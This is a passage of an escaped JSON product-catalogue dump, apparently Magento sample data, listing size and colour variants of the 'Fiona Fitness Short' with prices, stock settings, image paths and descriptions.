tock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Black\"},\"1864\":{\"sku\":\"WSH01-30-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-30-Green\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-30-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Green\"},\"1865\":{\"sku\":\"WSH01-30-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-30-Red\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-30-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Red\"},\"1866\":{\"sku\":\"WSH01-31-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-31-Black\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-31-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Black\"},\"1867\":{\"sku\":\"WSH01-31-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-31-Green\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-31-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Green\"},\"1868\":{\"sku\":\"WSH01-31-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-31-Red\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-31-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=31,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"31\",\"color\":\"Red\"},\"1869\":{\"sku\":\"WSH01-32-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-32-Black\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-32-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Black\"},\"1870\":{\"sku\":\"WSH01-32-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-32-Green\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-32-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Green\"},\"1871\":{\"sku\":\"WSH01-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short-32-Red\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"fiona-fitness-short-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"1872\":{\"sku\":\"WSH01\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Fiona Fitness Short\",\"description\":\"<p>Don\'t let the plain style fool you: the Fiona Fitness Short demands notice on several levels. Comfort, of course. But also a performance-grade wicking fabric that takes everything you can give.<\\/p>\\n<p>&bull; Black run shorts <br \\/>- cotton\\/spandex.<br \\/>&bull; 5&rdquo; inseam.<br \\/>&bull; Machine wash\\/Line dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_bottom=Basic|Base Layer,material=Organic 